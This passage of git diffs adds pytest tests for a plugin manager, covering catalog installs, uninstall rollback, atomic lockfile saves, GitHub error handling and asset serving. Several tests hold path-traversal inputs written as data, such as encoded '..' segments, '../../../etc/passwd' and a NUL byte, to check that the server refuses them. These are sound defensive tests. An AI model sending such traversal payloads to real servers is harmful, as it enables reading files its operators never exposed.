+    assert "CodefyUI/CodefyUI-Plugin-Graph-Copilot" in printed
+    assert "https://github.com/CodefyUI/CodefyUI-Plugin-Graph-Copilot" in printed
+    assert "copilot, llm, agent" in printed          # the catalog's tags
+    assert "official" in printed
+    assert "cccccccccccc" in printed                 # the live sha
+
+
+def test_info_still_answers_from_the_catalog_when_github_is_unreachable(
+    isolated_lockfile, monkeypatch, capsys
+):
+    """The catalog half is printed first for exactly this case: a student on
+    a school network still learns what the pack is and where it comes from."""
+    def _boom(*_a, **_k):
+        raise RuntimeError("GitHub API 403: rate limited")
+
+    monkeypatch.setattr(plugin_cli, "resolve_sha", _boom)
+    assert plugin_cli.cmd_info(
+        argparse.Namespace(source_or_id="self-learning")
+    ) == 1
+    printed = _out(capsys)
+    assert "CodefyUI/CodefyUI-Plugin-Self-Learning" in printed
+    assert "rate limited" in printed
+
+
+def test_sync_never_proposes_a_github_catalog_entry(isolated_lockfile, capsys):
+    """#175's line, held: sync activates what the release already put on
+    disk. Downloading someone else's repository is a consent decision, and
+    nothing that installs without being asked may make it."""
+    pending = core_catalog.available_builtin_packs(
+        plugin_cli.load_catalog(), {"plugins": {}}
+    )
+    pending_ids = {pack_id for pack_id, _ in pending}
+    assert pending_ids, "the built-in packs are still pending on an empty lockfile"
+    assert not (pending_ids & set(OFFICIAL_GITHUB_PACKS))
+
+    assert plugin_cli.cmd_sync(
+        argparse.Namespace(dry_run=True, prune=False, yes=False)
+    ) == 0
+    printed = _out(capsys)
+    for pack_id in OFFICIAL_GITHUB_PACKS:
+        assert pack_id not in printed

--- a/backend/tests/test_plugin_cli.py
+++ b/backend/tests/test_plugin_cli.py
@@ -1249,6 +1249,35 @@ def test_an_install_from_the_catalog_records_which_row_it_came_from(
     assert entry["catalog_id"] == "official-template"
 
 
+def test_a_catalog_row_whose_repository_declares_another_id_is_refused(
+    isolated_lockfile, fake_github, capsys, monkeypatch
+):
+    """The catalog names an id AND a repository; the repository's manifest
+    names an id too. When they drift apart the catalog is describing one pack
+    and fetching another -- and every card, lockfile key and
+    ``/api/plugins/<id>`` URL afterwards would use the manifest's id while
+    the user was reading the catalog's card. Nothing is written and the
+    refusal names both ids, because this is a bug in the catalog and the two
+    ids are what gets it fixed."""
+    monkeypatch.setenv("CODEFYUI_LANG", "en")
+    fake_github({
+        "cdui.plugin.toml": _manifest_declaring("renamed-plugin"),
+        "nodes/hello.py": "VALUE = 1\n",
+    })
+    rc = plugin_cli._install_github(
+        "CodefyUI", "CodefyUI-Plugin-Official", "",
+        _install_args(), plugin_loader.load_lockfile(),
+        catalog_id="official-template",
+    )
+    assert rc == 1
+    assert plugin_loader.load_lockfile()["plugins"] == {}
+    assert not (isolated_lockfile / "renamed-plugin").exists()
+    assert not (isolated_lockfile / "official-template").exists()
+    assert not (isolated_lockfile / ".staging").exists()
+    printed = _out(capsys)
+    assert "official-template" in printed and "renamed-plugin" in printed
+
+
 def test_search_lists_the_github_packs_and_marks_them_official(
     isolated_lockfile, capsys
 ):

--- a/backend/tests/test_plugin_cli.py
+++ b/backend/tests/test_plugin_cli.py
@@ -14,6 +14,7 @@ import plugins as plugin_cli
 from app.core import plugin_loader
 from app.core.plugin_validator import PluginValidationError
 from app.core.plugins import catalog as core_catalog
+from app.core.plugins import lifecycle
 
 
 # ── parse_source ───────────────────────────────────────────────────────────
@@ -840,6 +841,76 @@ def test_cmd_unlink_refuses_non_local_entry(isolated_lockfile):
 
 def test_cmd_unlink_missing_plugin_errors(isolated_lockfile):
     assert plugin_cli.cmd_unlink(argparse.Namespace(plugin_id="nope")) == 1
+
+
+# ── uninstall: the files go first, or nothing goes ─────────────────────────
+
+def test_a_downloaded_pack_whose_files_survive_stays_installed(
+    isolated_lockfile, monkeypatch, capsys
+):
+    """A failed delete abandons the uninstall instead of half-doing it.
+
+    Windows holds open files, so this is the ordinary failure, not an exotic
+    one. Popping the lockfile entry anyway would claim the pack is gone while
+    its directory keeps sitting in the user data dir -- and with nothing left
+    pointing at it, nothing would ever clean it up or load it again on
+    purpose. So the entry stays, and the command says why and fails.
+    """
+    plugin_dir = isolated_lockfile / "ghost"
+    _write_plugin_dir(plugin_dir, "ghost")
+    lockfile = plugin_loader.load_lockfile()
+    lockfile.setdefault("plugins", {})["ghost"] = {
+        "source_kind": "github_url",
+        "source": "alice/ghost",
+        "url": "https://github.com/alice/ghost",
+        "enabled": True,
+    }
+    plugin_loader.save_lockfile(lockfile)
+
+    def _refuse(*_args, **_kwargs):
+        raise OSError(13, "used by another process")
+
+    monkeypatch.setattr(lifecycle.shutil, "rmtree", _refuse)
+
+    outcome = lifecycle.uninstall_plugin("ghost")
+    assert outcome is not None
+    assert outcome.removed is False
+    assert outcome.tombstoned is False
+    assert outcome.files_removed is False
+    assert "used by another process" in outcome.error
+    assert "ghost" in plugin_loader.load_lockfile()["plugins"]
+    assert plugin_dir.is_dir()
+
+    # And the CLI reports it the way it always has: the failing path, the
+    # reason, and a non-zero exit code.
+    capsys.readouterr()
+    assert plugin_cli.main(["uninstall", "ghost"]) == 1
+    reported = capsys.readouterr().err
+    assert f"Failed to remove {plugin_dir}" in reported
+    assert "used by another process" in reported
+    assert "ghost" in plugin_loader.load_lockfile()["plugins"]
+
+
+def test_a_downloaded_pack_is_uninstalled_when_its_files_do_go(
+    isolated_lockfile, capsys
+):
+    """The other half of the rule, so the guard above cannot pass by
+    refusing every uninstall."""
+    plugin_dir = isolated_lockfile / "ghost"
+    _write_plugin_dir(plugin_dir, "ghost")
+    lockfile = plugin_loader.load_lockfile()
+    lockfile.setdefault("plugins", {})["ghost"] = {
+        "source_kind": "github_url",
+        "source": "alice/ghost",
+        "enabled": True,
+    }
+    plugin_loader.save_lockfile(lockfile)
+
+    assert plugin_cli.main(["uninstall", "ghost"]) == 0
+    assert "ghost" not in plugin_loader.load_lockfile()["plugins"]
+    assert not plugin_dir.exists()
+    # Not a built-in pack, so no tombstone: nothing re-adds a URL install.
+    assert plugin_loader.removed_ids(plugin_loader.load_lockfile()) == set()
 
 
 def test_cmd_reload_no_server_returns_zero(isolated_lockfile):

--- a/backend/tests/test_plugin_cli.py
+++ b/backend/tests/test_plugin_cli.py
@@ -760,6 +760,51 @@ def test_cmd_link_rejects_catalog_id_collision(isolated_lockfile, tmp_path):
     assert "foundations" not in plugin_loader.load_lockfile()["plugins"]
 
 
+def test_cmd_link_accepts_a_github_catalog_id(isolated_lockfile, tmp_path):
+    """Linking is how the author of an official plugin works on it.
+
+    The catalog lists CodefyUI-Plugin-Official under ``official-template``,
+    and a clone of that repository carries exactly that id in its manifest --
+    so a refusal keyed on "is this id in the catalog" would have made
+    ``cdui plugin link ./CodefyUI-Plugin-Official``, the documented dev loop,
+    impossible the moment the pack entered the catalog. There is no
+    repository to compare a local directory against and none is wanted: a
+    link points at the developer's own working tree, and nothing is
+    downloaded or trusted on the strength of the name.
+    """
+    work = tmp_path / "CodefyUI-Plugin-Official"
+    _write_plugin_dir(work, "official-template")
+    rc = plugin_cli.cmd_link(argparse.Namespace(path=str(work), force=False))
+    assert rc == 0
+    entry = plugin_loader.load_lockfile()["plugins"]["official-template"]
+    assert entry["source_kind"] == "local"
+    assert Path(entry["path"]) == work.resolve()
+
+
+@pytest.mark.parametrize(
+    ("plugin_id", "why"),
+    [
+        ("stats", "a pack that ships with CodefyUI"),
+        ("catalog", "a route under /api/plugins/"),
+    ],
+)
+def test_cmd_link_still_rejects_an_id_this_build_owns(
+    isolated_lockfile, tmp_path, capsys, monkeypatch, plugin_id, why
+):
+    """The half of the rule a local link does not get to bend: a built-in
+    pack's files ship in this repository and are activated in place, and a
+    route name is answered by the router, so in both cases something other
+    than the lockfile would decide what the id meant."""
+    monkeypatch.setenv("CODEFYUI_LANG", "en")
+    work = tmp_path / f"shadow-{plugin_id}"
+    _write_plugin_dir(work, plugin_id)
+    rc = plugin_cli.cmd_link(argparse.Namespace(path=str(work), force=False))
+    assert rc == 1
+    assert plugin_loader.load_lockfile()["plugins"] == {}
+    printed = capsys.readouterr()
+    assert why in printed.out + printed.err
+
+
 def test_cmd_link_existing_id_requires_force(isolated_lockfile, tmp_path):
     work = tmp_path / "dup"
     _write_plugin_dir(work, "dup-plugin")
@@ -1198,6 +1243,37 @@ def test_info_still_answers_from_the_catalog_when_github_is_unreachable(
     printed = _out(capsys)
     assert "CodefyUI/CodefyUI-Plugin-Self-Learning" in printed
     assert "rate limited" in printed
+
+
+def test_a_catalog_row_the_validator_dropped_is_refused_by_name(
+    isolated_lockfile, monkeypatch, capsys
+):
+    """The two readers disagree on purpose, and the gap has to be spoken.
+
+    ``parse_source`` matches the RAW registry, so a name the file lists is
+    never "unknown"; the installer dispatches on a VALIDATED row, so a github
+    entry it acts on really does carry an ``owner/repo``. A row in one and
+    not the other is named but not installable. Falling through to the
+    built-in installer -- which is what "not a github row" used to mean --
+    would report "no manifest on disk" for an entry whose actual problem is a
+    missing ``repo`` field two lines away.
+    """
+    monkeypatch.setenv("CODEFYUI_LANG", "en")
+    monkeypatch.setattr(plugin_cli, "load_catalog", lambda: {
+        "schema": 1,
+        "plugins": {"broken": {"kind": "github", "name": "Broken"}},   # no repo
+    })
+    # The premise: the name still parses as a catalog source.
+    assert plugin_cli.parse_source("broken") == ("catalog", "broken", "", "")
+    assert plugin_cli.catalog_entry("broken") is None
+
+    assert plugin_cli.cmd_install(_cmd_install_args("broken")) == 1
+    assert plugin_loader.load_lockfile()["plugins"] == {}
+    printed = _out(capsys)
+    assert "broken" in printed and "malformed" in printed
+
+    assert plugin_cli.cmd_info(argparse.Namespace(source_or_id="broken")) == 1
+    assert "malformed" in _out(capsys)
 
 
 def test_sync_never_proposes_a_github_catalog_entry(isolated_lockfile, capsys):

--- a/backend/tests/test_plugin_cli.py
+++ b/backend/tests/test_plugin_cli.py
@@ -91,7 +91,9 @@ def test_parse_source_bare_name_error_is_localized(monkeypatch):
     monkeypatch.setenv("CODEFYUI_LANG", "zh")
     with pytest.raises(ValueError) as excinfo:
         plugin_cli.parse_source("edo")
-    assert "內建包" in str(excinfo.value)
+    # Not 「內建包」: the list under this heading is the whole catalog, and
+    # three of its entries are repositories rather than packs shipped here.
+    assert "目前可裝的套件" in str(excinfo.value)
 
 
 def test_parse_source_accepts_every_catalog_pack():
@@ -878,6 +880,10 @@ def test_a_downloaded_pack_whose_files_survive_stays_installed(
     assert outcome.tombstoned is False
     assert outcome.files_removed is False
     assert "used by another process" in outcome.error
+    # The directory it tried to delete travels with the outcome, so the CLI
+    # line below prints where the files still are instead of rebuilding the
+    # path from the id.
+    assert outcome.directory == plugin_dir
     assert "ghost" in plugin_loader.load_lockfile()["plugins"]
     assert plugin_dir.is_dir()
 

--- a/backend/tests/test_plugin_dx.py
+++ b/backend/tests/test_plugin_dx.py
@@ -131,6 +131,26 @@ def test_new_scaffold_rejects_invalid_id(tmp_path):
     assert not (tmp_path / "Bad_Id").exists()
 
 
+def test_new_scaffold_refuses_a_route_name(tmp_path, capsys):
+    """``new``, ``link`` and ``install`` agree about which ids this build
+    owns, because they ask the same function. ``install`` is a fixed path
+    under /api/plugins/, so a plugin scaffolded under it could never be
+    installed -- the router would decide which one answered."""
+    assert plugin_cli.main(["new", "install", "--dir", str(tmp_path)]) == 2
+    assert not (tmp_path / "install").exists()
+    printed = capsys.readouterr()
+    assert "install" in printed.out + printed.err
+
+
+def test_new_scaffold_allows_the_id_of_an_official_github_pack(tmp_path):
+    """The other side of the same rule: a ``github`` catalog id is not
+    reserved, because it is the id the author of an official plugin
+    scaffolds and installs their own repository under. Refusing it here was
+    refusing the author their own name."""
+    assert plugin_cli.main(["new", "official-template", "--dir", str(tmp_path)]) == 0
+    assert (tmp_path / "official-template" / "cdui.plugin.toml").is_file()
+
+
 def test_new_scaffold_refuses_existing_nonempty(tmp_path):
     existing = tmp_path / "dupe"
     existing.mkdir()

--- a/backend/tests/test_plugin_frontend.py
+++ b/backend/tests/test_plugin_frontend.py
@@ -213,6 +213,17 @@ def test_an_asset_of_an_unknown_type_downloads_rather_than_guesses(fe_client):
     assert r.headers["content-type"] == "application/octet-stream"
 
 
+def test_head_answers_the_headers_without_the_body(fe_client):
+    """The mount this route replaced answered HEAD, so this one does too --
+    something sizing a dataset before it downloads it still gets an answer."""
+    head = fe_client.head("/plugins/fe-pack/assets/data.csv")
+    get = fe_client.get("/plugins/fe-pack/assets/data.csv")
+    assert head.status_code == 200
+    assert head.content == b""
+    assert head.headers["content-length"] == get.headers["content-length"]
+    assert head.headers["content-type"] == get.headers["content-type"]
+
+
 def test_assets_are_revalidated_like_bundles(fe_client):
     # `cdui plugin update` replaces a pack's data files under their existing
     # names, so a heuristically cached CSV outlives the update that changed it.

--- a/backend/tests/test_plugin_frontend.py
+++ b/backend/tests/test_plugin_frontend.py
@@ -287,6 +287,27 @@ def test_the_traversal_check_refuses_a_parent_segment_unencoded(
     ) is None
 
 
+@pytest.mark.parametrize(
+    "path, detail",
+    [
+        ("/plugins/fe-pack/frontend/index%00.js", "Plugin frontend resource not found"),
+        ("/plugins/fe-pack/assets/data%00.csv", "Plugin asset not found"),
+    ],
+)
+def test_a_nul_byte_in_the_path_is_a_404_on_both_routes(fe_client, path, detail):
+    """``%00`` is a refusal, not a traceback.
+
+    Starlette hands the decoded path through, so the NUL reaches
+    ``Path.resolve``, which raises ``ValueError`` rather than answering about
+    a file. Uncaught, that is a 500 with a stack trace in the log -- on the
+    assets route, which takes no session token, so anyone who can reach the
+    port can produce one. The ``StaticFiles`` mount this route replaced
+    answered 404, and so does this."""
+    r = fe_client.get(path)
+    assert r.status_code == 404
+    assert r.json()["detail"] == detail
+
+
 def test_404_for_an_asset_of_a_disabled_plugin(fe_client):
     assert fe_client.get("/plugins/fe-disabled/assets/data.csv").status_code == 404
 

--- a/backend/tests/test_plugin_frontend.py
+++ b/backend/tests/test_plugin_frontend.py
@@ -1,13 +1,22 @@
-"""Tests for plugin frontend-extension support (manifest validation,
-bundle serving, /api/plugins frontend_entry field)."""
+"""Tests for the files a plugin ships: manifest validation, bundle serving,
+``assets/`` serving, and the /api/plugins frontend_entry field.
+
+Both serving routes resolve the plugin per REQUEST, which is what the
+``assets/`` tests below are really about: the URL is the one the
+``StaticFiles`` mounts used to answer, and the cases that would have failed
+under a mount built once at startup -- a plugin installed after the app
+object exists, and a plugin disabled after it -- are the point of the change.
+"""
 
 from __future__ import annotations
 
 import json
+import mimetypes
 from pathlib import Path
 
 import pytest
 
+from app.api.routes_plugin_frontend import _file_under
 from app.core import plugin_loader
 from app.core.plugin_loader import frontend_entry_rel
 
@@ -50,11 +59,23 @@ def test_entry_rel_normalizes_backslashes():
     assert frontend_entry_rel({"frontend": {"entry": "frontend\\index.js"}}) == "frontend/index.js"
 
 
+#: What a pack ships in ``assets/``: a data file its nodes read and an image
+#: its lesson shows. Bytes nobody parses -- the route answers on the name --
+#: and written as bytes so a Windows checkout does not turn the newlines of
+#: the CSV into something the assertions have to know about.
+ASSET_CSV = b"a,b\n1,2\n"
+ASSET_PNG = b"\x89PNG\r\n\x1a\n-not-a-real-png-"
+
+
 def _write_frontend_plugin(root: Path, plugin_id: str, *, enabled: bool = True,
                            with_entry: bool = True) -> None:
-    """Create a fake installed third-party plugin with a frontend bundle."""
+    """Create a fake installed third-party plugin with a bundle and assets."""
     pdir = root / plugin_id
     (pdir / "frontend").mkdir(parents=True)
+    (pdir / "assets" / "img").mkdir(parents=True)
+    (pdir / "assets" / "data.csv").write_bytes(ASSET_CSV)
+    (pdir / "assets" / "img" / "logo.png").write_bytes(ASSET_PNG)
+    (pdir / "assets" / "blob.weird").write_bytes(b"\x00\x01\x02")
     manifest = [
         "[plugin]",
         f'id = "{plugin_id}"',
@@ -152,6 +173,132 @@ def test_404_when_manifest_has_no_frontend_table(fe_client):
 def test_404_for_unknown_plugin_and_missing_file(fe_client):
     assert fe_client.get("/plugins/ghost/frontend/index.js").status_code == 404
     assert fe_client.get("/plugins/fe-pack/frontend/missing.js").status_code == 404
+
+
+# -- GET /plugins/<id>/assets/<path> -----------------------------------------
+
+def _set_enabled(root: Path, plugin_id: str, enabled: bool) -> None:
+    """Flip a plugin's ``enabled`` flag in the lockfile, in place."""
+    lock_path = root / "installed.json"
+    lock = json.loads(lock_path.read_text(encoding="utf-8"))
+    lock["plugins"][plugin_id]["enabled"] = enabled
+    lock_path.write_text(json.dumps(lock), encoding="utf-8")
+
+
+def test_serves_an_asset_with_the_type_mimetypes_gives_it(fe_client):
+    r = fe_client.get("/plugins/fe-pack/assets/data.csv")
+    assert r.status_code == 200
+    assert r.content == ASSET_CSV
+    # Not spelled "text/csv": Windows reads media types from the registry,
+    # where .csv is commonly application/vnd.ms-excel. What the route
+    # promises is the answer mimetypes gives on THIS machine -- and that it
+    # is a real answer rather than the octet-stream fallback below.
+    expected = mimetypes.guess_type("data.csv")[0]
+    assert expected is not None
+    assert r.headers["content-type"].split(";")[0] == expected
+
+
+def test_serves_an_asset_from_a_subdirectory(fe_client):
+    r = fe_client.get("/plugins/fe-pack/assets/img/logo.png")
+    assert r.status_code == 200
+    assert r.content == ASSET_PNG
+    # Pinned in app.main for Windows, standard everywhere else.
+    assert r.headers["content-type"] == "image/png"
+
+
+def test_an_asset_of_an_unknown_type_downloads_rather_than_guesses(fe_client):
+    """A pack may ship a .npz or a .pt as readily as a .png."""
+    r = fe_client.get("/plugins/fe-pack/assets/blob.weird")
+    assert r.status_code == 200
+    assert r.headers["content-type"] == "application/octet-stream"
+
+
+def test_assets_are_revalidated_like_bundles(fe_client):
+    # `cdui plugin update` replaces a pack's data files under their existing
+    # names, so a heuristically cached CSV outlives the update that changed it.
+    r = fe_client.get("/plugins/fe-pack/assets/data.csv")
+    assert "no-cache" in r.headers.get("cache-control", "")
+
+
+def test_assets_need_no_manifest_declaration(fe_client):
+    """Unlike the bundle: a pack either has an assets/ directory or has not,
+    and a node reading its own CSV declares nothing to do it."""
+    r = fe_client.get("/plugins/no-fe/assets/data.csv")
+    assert r.status_code == 200
+
+
+def test_404_for_unknown_plugin_and_missing_asset(fe_client):
+    assert fe_client.get("/plugins/ghost/assets/data.csv").status_code == 404
+    assert fe_client.get("/plugins/fe-pack/assets/missing.csv").status_code == 404
+
+
+def test_404_for_a_directory_rather_than_a_listing(fe_client):
+    for path in ("/plugins/fe-pack/assets/img", "/plugins/fe-pack/assets/img/"):
+        r = fe_client.get(path)
+        assert r.status_code == 404, path
+        assert r.json()["detail"] == "Plugin asset not found", path
+
+
+@pytest.mark.parametrize(
+    "path",
+    [
+        "/plugins/fe-pack/assets/..%2Fcdui.plugin.toml",
+        "/plugins/fe-pack/assets/%2e%2e/cdui.plugin.toml",
+        "/plugins/fe-pack/assets/%2e%2e%2fsecret.txt",
+        "/plugins/fe-pack/assets/img/%2e%2e/%2e%2e/secret.txt",
+    ],
+)
+def test_404_for_anything_outside_the_assets_dir(fe_client, path):
+    """The manifest and the pack's own files sit one level above assets/,
+    and `..` has more spellings over the wire than a string check has.
+
+    Encoded, all of them: httpx applies RFC 3986 dot-segment removal to the
+    URL before it sends anything, so a plain ``../`` never reaches the app
+    from this client. That spelling is proven against the check itself
+    below -- a client that does not normalise can still send it."""
+    r = fe_client.get(path)
+    assert r.status_code == 404
+    # From THIS route, not from the SPA fallback that answers 404 for
+    # everything else: a refusal that arrives by accident stops being one
+    # the day the route stops matching.
+    assert r.json()["detail"] == "Plugin asset not found"
+
+
+@pytest.mark.parametrize(
+    "resource_path",
+    ["../cdui.plugin.toml", "img/../../secret.txt", "../../../etc/passwd", ".."],
+)
+def test_the_traversal_check_refuses_a_parent_segment_unencoded(
+        frontend_plugin_env, resource_path):
+    """The half of the traversal contract an HTTP client normalises away."""
+    assert _file_under(
+        frontend_plugin_env / "fe-pack" / "assets", resource_path
+    ) is None
+
+
+def test_404_for_an_asset_of_a_disabled_plugin(fe_client):
+    assert fe_client.get("/plugins/fe-disabled/assets/data.csv").status_code == 404
+
+
+def test_disabling_a_plugin_stops_serving_its_assets_at_once(
+        fe_client, frontend_plugin_env):
+    """A mount created at startup kept serving a disabled plugin's files
+    until a restart. The route reads the lockfile the disable just wrote."""
+    assert fe_client.get("/plugins/fe-pack/assets/data.csv").status_code == 200
+    _set_enabled(frontend_plugin_env, "fe-pack", False)
+    assert fe_client.get("/plugins/fe-pack/assets/data.csv").status_code == 404
+
+
+def test_a_plugin_installed_after_startup_serves_its_assets(
+        fe_client, frontend_plugin_env):
+    """The regression this route exists for. The app object -- and, under a
+    mount, the whole routing table for assets -- is already built when the
+    plugin arrives."""
+    assert fe_client.get("/plugins/late-pack/assets/data.csv").status_code == 404
+    _write_frontend_plugin(frontend_plugin_env, "late-pack")
+    r = fe_client.get("/plugins/late-pack/assets/data.csv")
+    assert r.status_code == 200
+    assert r.content == ASSET_CSV
 
 
 # -- /api/plugins frontend_entry ---------------------------------------------

--- a/backend/tests/test_plugin_loader.py
+++ b/backend/tests/test_plugin_loader.py
@@ -85,6 +85,61 @@ def test_save_then_load_roundtrip(isolated_lockfile):
     assert plugin_loader.load_lockfile() == payload
 
 
+def test_save_leaves_no_temp_file_behind(isolated_lockfile):
+    """The write goes through a temp file; a successful one is renamed, not
+    left beside the lockfile for the next reader to wonder about."""
+    plugin_loader.save_lockfile({"schema": 1, "plugins": {}})
+    assert [p.name for p in isolated_lockfile.iterdir()] == ["installed.json"]
+
+
+def test_a_failed_save_keeps_the_lockfile_that_was_there(isolated_lockfile,
+                                                         monkeypatch):
+    """The reason the write is atomic. This file is the only record of what
+    is installed, so a write that dies partway must not be able to replace it
+    with half a JSON document -- which ``load_lockfile`` reads as "you have
+    no plugins" while every one of their directories is still on disk."""
+    good = {"schema": 1, "plugins": {"c2": {"source_kind": "builtin"}}}
+    plugin_loader.save_lockfile(good)
+
+    def _refuse(*_args, **_kwargs):
+        raise OSError(13, "denied")
+
+    monkeypatch.setattr(plugin_loader.os, "replace", _refuse)
+    with pytest.raises(OSError):
+        plugin_loader.save_lockfile({"schema": 1, "plugins": {}})
+
+    assert plugin_loader.load_lockfile() == good
+    assert [p.name for p in isolated_lockfile.iterdir()] == ["installed.json"], \
+        "the temp file goes with the failure"
+
+
+# ──────────────────────────────────────────────────────────────────────
+# read_manifest_safe
+# ──────────────────────────────────────────────────────────────────────
+
+@pytest.mark.parametrize(
+    "content",
+    [
+        b"\xff\xfe not utf-8 at all",          # UnicodeDecodeError
+        b"this is not = = toml",               # TOMLDecodeError
+    ],
+)
+def test_read_manifest_safe_answers_empty_for_a_manifest_it_cannot_read(
+    tmp_path, content
+):
+    """Every caller of this is on its way to drawing a list -- the two plugin
+    listings and ``cdui plugin list`` -- so one unreadable pack must cost its
+    own metadata, not the whole list."""
+    plugin_dir = tmp_path / "broken"
+    plugin_dir.mkdir()
+    (plugin_dir / "cdui.plugin.toml").write_bytes(content)
+    assert plugin_loader.read_manifest_safe(plugin_dir) == {}
+
+
+def test_read_manifest_safe_answers_empty_when_there_is_no_manifest(tmp_path):
+    assert plugin_loader.read_manifest_safe(tmp_path / "nothing-here") == {}
+
+
 # ──────────────────────────────────────────────────────────────────────
 # install_plugin_finder
 # ──────────────────────────────────────────────────────────────────────

--- a/backend/tests/test_plugins_core_inspect.py
+++ b/backend/tests/test_plugins_core_inspect.py
@@ -16,6 +16,7 @@ somebody else's CI run.
 
 from __future__ import annotations
 
+import http.client
 import io
 import tarfile
 from pathlib import Path
@@ -440,6 +441,32 @@ def test_a_request_that_never_reached_github_has_no_status(fake_urlopen):
         github.resolve_sha("alice", "extras", "")
     assert excinfo.value.status is None
     assert "getaddrinfo failed" in str(excinfo.value)
+
+
+def test_a_200_that_is_not_json_is_a_github_failure_with_no_status(fake_urlopen):
+    """A captive portal, a school proxy's block page and a transparent MITM
+    all answer "200 OK" with HTML. ``json.loads`` raises a ``ValueError`` for
+    that, which no caller of ``resolve_sha`` catches -- the CLI's
+    ``except RuntimeError`` included -- so it would have been a traceback on
+    the first school network that intercepts GitHub."""
+    fake_urlopen(lambda: _FakeResponse([b"<html>Access denied</html>"]))
+    with pytest.raises(GitHubError) as excinfo:
+        github.resolve_sha("alice", "extras", "v1")
+    assert excinfo.value.status is None, "whatever answered was not GitHub"
+    assert "did not return JSON" in str(excinfo.value)
+    assert "alice/extras@v1" in str(excinfo.value)
+
+
+def test_a_url_http_client_will_not_send_is_a_github_failure(fake_urlopen):
+    """``InvalidURL`` is an ``http.client.HTTPException``, which is not an
+    ``OSError`` and so not a ``URLError`` -- it escaped the whole translation
+    layer. It is what a ref with a space or a control character in it becomes
+    by the time ``putrequest`` sees the URL."""
+    fake_urlopen(http.client.InvalidURL("URL can't contain control characters"))
+    with pytest.raises(GitHubError) as excinfo:
+        github.resolve_sha("alice", "extras", "v 1")
+    assert excinfo.value.status is None
+    assert "control characters" in str(excinfo.value)
 
 
 def test_a_commit_response_without_a_sha_is_refused(fake_urlopen):

--- a/backend/tests/test_plugins_core_inspect.py
+++ b/backend/tests/test_plugins_core_inspect.py
@@ -243,6 +243,40 @@ def test_a_repository_may_not_claim_a_reserved_id(plugin_id, fake_github):
     assert plugin_id in str(excinfo.value)
 
 
+def test_a_fork_may_not_claim_the_catalog_id_of_an_official_plugin(fake_github):
+    """The third clause of the reserved-id rule, which the CLI enforced and
+    this did not. ``self-learning`` is a ``github`` catalog row: its id is
+    not reserved outright -- its own author installs the repository under it
+    -- so an id-only check passes ``mallory/evil`` straight through, and the
+    id is what the lockfile, the catalog card and ``/api/plugins/{id}`` all
+    key on."""
+    fake_github(
+        '[plugin]\nid = "self-learning"\nversion = "1"\nschema_version = 1\n'
+    )
+    with pytest.raises(PluginInstallError) as excinfo:
+        plugin_inspect.inspect_github("mallory", "evil", "", lockfile={})
+    hint = excinfo.value.hint or ""
+    assert "CodefyUI/CodefyUI-Plugin-Self-Learning" in hint
+    assert "mallory/evil" in hint
+
+
+def test_the_repository_the_catalog_names_may_claim_its_own_id(fake_github):
+    """The other half, and the reason the clause is about the repository
+    rather than the id: refusing every catalog id would make the official
+    pack the one thing the catalog advertises and nobody can install."""
+    fake_github(
+        '[plugin]\nid = "self-learning"\nversion = "1"\nschema_version = 1\n'
+    )
+    found = plugin_inspect.inspect_github(
+        "CodefyUI", "CodefyUI-Plugin-Self-Learning", "", lockfile={}
+    )
+    assert found.plugin_id == "self-learning"
+    # Case-insensitively, because GitHub owners and repositories are.
+    assert plugin_inspect.inspect_github(
+        "codefyui", "codefyui-plugin-self-learning", "", lockfile={}
+    ).plugin_id == "self-learning"
+
+
 # ── an update compared against what was consented to ───────────────────────
 
 def test_an_update_names_the_capability_this_version_added(fake_github):

--- a/backend/tests/test_plugins_core_inspect.py
+++ b/backend/tests/test_plugins_core_inspect.py
@@ -1,0 +1,655 @@
+"""The half of a plugin install that happens before anybody says yes.
+
+Reading a source, deciding what has already been consented to, and moving
+bytes off GitHub -- all three used to live in ``scripts/plugins.py``, where
+the only way to reach them was to run the CLI. These tests exercise them as
+what they now are: functions the server can call, with no terminal, no
+lockfile on disk and no network.
+
+Nothing here touches GitHub. An autouse fixture replaces ``urlopen`` in the
+GitHub client with one that fails the test if it is ever reached, and the
+two suites that need a transport (``_gh_get`` and ``download_tarball``)
+install their own fake over the top of it. A test in this file that starts
+making real requests fails loudly rather than becoming slow and flaky in
+somebody else's CI run.
+"""
+
+from __future__ import annotations
+
+import io
+import tarfile
+from pathlib import Path
+from textwrap import dedent
+from urllib.error import HTTPError, URLError
+
+import pytest
+
+from app.core.plugins import catalog as catalog_module
+from app.core.plugins import consent, github
+from app.core.plugins import inspect as plugin_inspect
+from app.core.plugins.errors import (
+    ConsentRequired,
+    GitHubError,
+    ManifestError,
+    PluginCancelled,
+    PluginInstallError,
+)
+
+
+# ── fixtures ───────────────────────────────────────────────────────────────
+
+@pytest.fixture(autouse=True)
+def no_network(monkeypatch):
+    """Fail any test that reaches an actual socket.
+
+    The functions under test are the ones that talk to GitHub, so "we
+    remembered to fake it" cannot be left to each test to get right.
+    """
+    def _explode(*_a, **_k):  # pragma: no cover - only runs on a bug
+        raise AssertionError("a test in this file tried to reach the network")
+
+    monkeypatch.setattr(github.urllib.request, "urlopen", _explode)
+
+
+def _tarball_of(files: dict[str, str], dest: Path) -> None:
+    """Pack ``{path inside the archive: text}`` into a gzipped tar."""
+    with tarfile.open(dest, "w:gz") as tf:
+        for rel, text in files.items():
+            data = text.encode("utf-8")
+            member = tarfile.TarInfo(rel)
+            member.size = len(data)
+            tf.addfile(member, io.BytesIO(data))
+
+
+@pytest.fixture
+def fake_github(monkeypatch):
+    """Serve one commit -- a sha, a manifest and a tarball -- with no network."""
+    def _make(manifest_text: str, *, sha: str = "a" * 40, files=None):
+        monkeypatch.setattr(github, "resolve_sha", lambda o, r, ref: sha)
+        monkeypatch.setattr(
+            github, "fetch_manifest_text", lambda o, r, s: manifest_text
+        )
+        payload = {"cdui.plugin.toml": manifest_text, **(files or {})}
+        monkeypatch.setattr(
+            github,
+            "download_tarball",
+            lambda owner, repo, s, dest, **kw: _tarball_of(
+                {f"{repo}-main/{rel}": text for rel, text in payload.items()}, dest
+            ),
+        )
+        return sha
+
+    return _make
+
+
+PLAIN_MANIFEST = dedent("""\
+    [plugin]
+    id = "extras"
+    name = "Extras"
+    version = "1.2.0"
+    description = "A third-party pack."
+    schema_version = 1
+    """)
+
+GREEDY_MANIFEST = dedent("""\
+    [plugin]
+    id = "extras"
+    name = "Extras"
+    version = "2.0.0"
+    schema_version = 1
+
+    [security]
+    capabilities = ["network", "filesystem"]
+    allowed_modules = ["subprocess"]
+
+    [frontend]
+    entry = "dist/index.js"
+
+    [lessons]
+    chapters = ["I9"]
+    lessons = ["I9-1"]
+    """)
+
+
+def _installed(**overrides) -> dict:
+    entry = {
